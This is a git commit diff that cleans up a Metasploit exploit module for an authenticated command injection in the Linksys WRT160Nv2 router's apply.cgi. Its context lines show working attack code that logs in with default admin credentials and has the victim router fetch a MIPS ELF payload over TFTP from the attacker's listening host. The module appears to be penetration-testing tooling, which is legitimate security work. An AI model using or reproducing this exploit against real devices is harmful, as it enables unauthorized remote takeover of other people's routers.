Do minor cleanup for linksys_wrt160nv2_apply_exec

jvazquez-r7 · jvazquez-r7 · commit 395aac90c2f4 · 2013-05-20T10:34:39.000-05:00
diff --git a/modules/exploits/linux/http/linksys_wrt160nv2_apply_exec.rb b/modules/exploits/linux/http/linksys_wrt160nv2_apply_exec.rb
@@ -14,19 +14,18 @@ class Metasploit3 < Msf::Exploit::Remote
 	include Msf::Exploit::Remote::HttpClient
 	include Msf::Exploit::EXE
 	include Msf::Exploit::FileDropper
-	include Msf::Exploit::Remote::TFTPServer
 
 	def initialize(info = {})
 		super(update_info(info,
 			'Name'        => 'Linksys WRT160nv2 apply.cgi Remote Command Injection',
 			'Description' => %q{
-					Some Linksys Routers are vulnerable to an authenticated OS command injection.
-				Default credentials for the web interface are admin/admin or admin/password. Since
-				it is a blind os command injection vulnerability, there is no output for the
-				executed command when using the cmd generic payload. This module was tested on a 
-				Linksys WRT160n version 2 - firmware version v2.0.03. A ping command against a
+					Some Linksys Routers are vulnerable to an authenticated OS command injection on
+				their web interface where default credentials are admin/admin or admin/password.
+				Since it is a blind OS command injection vulnerability, there is no output for the
+				executed command when using the cmd generic payload. This module has been tested on
+				a  Linksys WRT160n version 2 - firmware version v2.0.03. A ping command against a
 				controlled system could be used for testing purposes. The exploit uses the tftp
-				client from the device to download the payload.
+				client from the device to stage to native payloads from the command injection.
 			},
 			'Author'      =>
 				[
@@ -70,7 +69,7 @@ def initialize(info = {})
 			[
 				OptString.new('USERNAME', [ true, 'The username to authenticate as', 'admin' ]),
 				OptString.new('PASSWORD', [ true, 'The password for the specified username', 'admin' ]),
-				OptAddress.new('LHOST', [ true, 'Our localhost IP address from where the victim downloads the MIPS payload' ]),
+				OptAddress.new('LHOST', [ true, 'The listen IP address from where the victim downloads the MIPS payload' ]),
 				OptString.new('DOWNFILE', [ false, 'Filename to download, (default: random)' ]),
 				OptInt.new('DELAY', [true, 'Time that the HTTP Server will wait for the ELF payload request', 10])
 			], self.class)
@@ -170,13 +169,14 @@ def exploit
 			fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
 		end
 
-                # wait for payload download
+        # wait for payload download
 		if (datastore['DOWNHOST'])
 			print_status("#{rhost}:#{rport} - Giving #{datastore['DELAY']} seconds to the Linksys device to download the payload")
 			select(nil, nil, nil, datastore['DELAY'])
 		else
 			wait_linux_payload
 		end
+		@tftp.stop
 		register_file_for_cleanup("/tmp/#{filename}")
 
 		#
@@ -207,10 +207,10 @@ def wait_linux_payload
 
 		waited = 0
 		while (not @tftp.files.length == 0)
-			puts @tftp.files.length
 			select(nil, nil, nil, 1)
 			waited += 1
 			if (waited > datastore['DELAY'])
+				@tftp.stop
 				fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Target didn't request request the ELF payload -- Maybe it cant connect back to us?")
 			end
 		end
